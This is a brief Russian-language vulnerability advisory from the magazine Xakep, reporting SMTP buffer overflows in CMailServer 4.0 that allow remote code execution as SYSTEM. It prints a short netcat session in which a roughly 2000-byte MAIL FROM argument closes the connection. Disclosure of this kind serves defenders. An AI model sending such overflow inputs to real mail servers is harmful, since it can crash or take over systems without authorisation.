Выполнение произвольного кода в CMailServer

Рекомендуем почитать:

Xakep #303. Свой Arch Linux

Содержание выпуска
Подписка на «Хакер»-60%

Несколько переполнений буфера обнаружено в CMailServer. Удаленный пользователь может выполнить произвольный код с SYSTEM привилегиями.

Уязвимость обнаружена в протоколе обработки SMTP сервера.
Удаленный пользователь может переполнить буфер и выполнить произвольный код с System привилегиями. Пример:

nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

Уязвимость обнаружена в CMailServer 4.0.2002.11.24.

Выполнение произвольного кода в CMailServer

Xakep #303. Свой Arch Linux

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Power-моддинг. Настраиваем PowerShell, чтобы получать удовольствие от работы

HTB Intuition. Эксплуатируем баг в раннере Ansible для повышения привилегий

OAuth от и до. Ищем цепочки уязвимостей при атаках на авторизацию

Эй, на борту! Перехватываем и разбираем сигнал AIS — системы идентификации кораблей

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

Более 2750 человек пострадали в Ливане из-за взорвавшихся пейджеров

Компания «Доктор Веб» подверглась кибератаке

Появился эксплоит для критического бага в Ivanti Endpoint Manager

30 000 сотрудников Transport for London должны обновить свои пароли и пройти верификацию личности

В Wi-Fi 6 роутерах D-Link обнаружили жестко закодированный пароль